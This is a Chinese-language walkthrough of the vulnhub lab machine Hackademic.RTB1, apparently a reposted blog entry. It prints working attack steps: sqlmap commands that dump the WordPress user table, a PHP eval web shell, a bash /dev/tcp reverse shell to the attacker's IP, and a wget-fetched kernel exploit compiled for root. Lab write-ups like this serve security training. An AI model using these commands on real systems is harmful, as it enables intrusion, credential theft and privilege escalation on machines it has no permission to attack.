首页 > 其他分享 >vulnhub - Hackademic.RTB1

vulnhub - Hackademic.RTB1

时间:2024-09-20 14:26:11浏览次数:11  
标签:Hackademic http -- 192.168 vulnhub RTB1 157.178

vulnhub - Hackademic.RTB1

基本信息收集

nmap 192.168.157.0/24
nmap -sT --min-rate 10000 -p- 192.168.157.178

image-20240918215648708

识别到是WordPress,直接上wpscan

wpscan --url http://192.168.157.178/ -e at -e ap -eu

image-20240919101921624

得到用户:NickJames

SQL注入

有超链接的地方点点发现参数如下

http://192.168.157.178/Hackademic_RTB1/?p=9
http://192.168.157.178/Hackademic_RTB1/?cat=1

测试sql注入

image-20240919103026318

搜索框输入后参数变为 http://192.168.157.178/Hackademic_RTB1/index.php?s=-1,输入-1'会被转义为-1\\\'

点击月份发现参数为?m=201101

用sqlmap轮番测试

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent --dbs

image-20240919104001605

cat参数存在注入点,走常规流程

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" --tables --batch

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" -T "wp_users" --columns --batch

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" -T "wp_users" -C "user_nicename,user_pass" --dump --batch

image-20240919104557135

jognsmith的密码也可以查到:PUPPIES

image-20240919104644134

nickjames admin
maxbucky kernel
georgemiller q1w2e3
jasonkonnors maxwell
tonyblack napoleon
johnsmith PUPPIES

找一下后台地址

dirsearch -u http://192.168.157.178/Hackademic_RTB1/

image-20240919105250253

结果都登不上,考虑是用户名大小写问题

sqlmap -u "http://192.168.157.178/Hackademic_RTB1/index.php?cat=1" --random-agent -D "wordpress" -T "wp_users" -C "user_login,user_nickname" --dump --batch

image-20240919105852308

NickJames admin
MaxBucky kernel
GeorgeMiller q1w2e3
JasonKonnors maxwell
TonyBlack napoleon
JohnSmith PUPPIES

文件上传

登入测试后发现GeorgeMiller权限最高,寻找利用点

image-20240919122657501

此处可以文件上传,先测试下<?php phpinfo(); ?>

image-20240919122816975

一句话木马连接蚁剑<?php eval($_POST[cmd]); ?>

image-20240919123210987

反弹shell

蚁剑终端

bash -i >& /dev/tcp/192.168.157.161/9999 0>&1

image-20240919123853649

没有权限,查看内核版本

bash-4.0$ uname -a
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

提权

尝试内核提权

searchsploit Linux Kernel 2.6.3 | grep "Local Privilege Escalation"

尝试后发现 15285.c 可用

image-20240919144044005

复制到/tmp目录

cp /usr/share/exploitdb/exploits/linux/local/15285.c /tmp

kali开启服务

python3 -m http.server 80

靶机上下载

wget http://192.168.157.161/15285.c

image-20240919145040922

编译后运行

gcc -o exp 15285.c
chmod +x exp
./exp

image-20240919145200124

拿到key.txt

image-20240919145331216

总结

一台适合盲打的机器

标签:Hackademic,http,--,192.168,vulnhub,RTB1,157.178
From: https://www.cnblogs.com/Mar10/p/18422422

相关文章

  • VulnHub-Bilu_b0x靶机笔记
    Bilu_b0x靶机概述Vulnhub的一个靶机,包含了sql注入,文件包含,代码审计,内核提权。整体也是比较简单的内容,和大家一起学习Billu_b0x.zip靶机地址:https://pan.baidu.com/s/1VWazR7tpm2xJZIGUSzFvDw?pwd=u785提取码:u785一、nmap扫描1)主机发现sudonmap-sn192.168.84.......
  • Hackademic.RTB1 打靶记录
    第一次打靶机,思路看的红队笔记https://www.vulnhub.com/entry/hackademic-rtb1,17/环境:kaliLinux-192.168.75.131,靶机-192.168.75.132主机发现和端口扫描扫描整个网络有哪台机子在线,不进行端口扫描nmap-sP192.168.75.0/24StartingNmap7.93(https://nmap.or......
  • Vulnhub靶机:Kioptrix_Level1.2
    信息收集使用nmap主机发现靶机ipkaliip192.168.134.130扫IP使用nmap端口扫描发现靶机开放端口nmap-A192.168.134.156-p1-65535打开网站,点击login,跳转到登录页面,发现该网站cms为:LotusCMS访问http://192.168.134.156/gallerySQL注入1、发现url中含......
  • vulnhub(9):sickos1.2(深挖靶机的各个细节、文件管道反弹shell详解、base64编码反弹shell
    端口nmap主机发现nmap-sn192.168.148.0/24​Nmapscanreportfor192.168.148.131Hostisup(0.00020slatency).​131是新出现的机器,他就是靶机nmap端口扫描nmap-Pn192.168.148.131-p---min-rate10000-oAnmap/scan扫描开放端口保存到nmap/scan下​......
  • 靶机 hackademic-udf提权
    sqlmap一把梭burpsuit跑账号密码,可能跑不出来,登录有点问题查不到有用信息,尝试内核提权提权成功拓展-mysqludf提权看到别人的wp改造一下靶机能学到别的东西https://blog.csdn.net/Bossfrank/article/details/131553175先拿到root权限,在/usr/lib/mysql/目录下将plugin目录的......
  • Vulnhub:Finding My Friend
    靶机下载地址靶机搭建时可能的报错靶机下载成功后在virtualbox中打开,启动虚拟机时报错virtualboxe_fail0x80004005,这个错误code说明可能存在配置错误、操作系统不兼容、硬件问题等。该靶机属于串口路径错误。我的解决办法是:靶机设置——》串口——》全部取消。信息收集......
  • Vulnhub-行星系列:Venus渗透-超详保姆式教学
    借用Vulnhub的一句话:请记住,VulnHub是一个免费的社区资源,因此我们无法检查提供给我们的机器。在下载之前,请阅读我们的常见问题解答部分,这些部分涉及运行未知VM的危险,以及我们关于“保护您自己和您的网络”的建议。如果您了解风险,请下载!靶机下载地址:https://download.vulnhu......
  • 看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-1_vulnhub-靶机
    Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集:②:目录爆破:③:暴力破解:④:提权:⑤:获取flag:Vulnhub靶机渗透总结:Vulnhub靶机介绍:vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开......
  • vulnhub靶场—————Momentum:2
    总体目标:       掌握单个目标机渗透思路本期内容:靶场地址:Momentum:2~VulnHubhttps://www.vulnhub.com/entry/momentum-2,702/靶场截图:总体思路:信息收集       漏洞发现利用       权限获取       目的达成具体实现:nmap主机发现,......
  • vulnhub靶场————Momentum:1
    总体目标:    掌握单个目标机渗透思路本期内容:靶场地址:Momentum:1~VulnHubhttps://www.vulnhub.com/entry/momentum-1,685/靶场截图:总体思路:信息搜集    漏洞利用    权限获取    目的达成具体实现:nmap主机发现、端口扫描dirsear......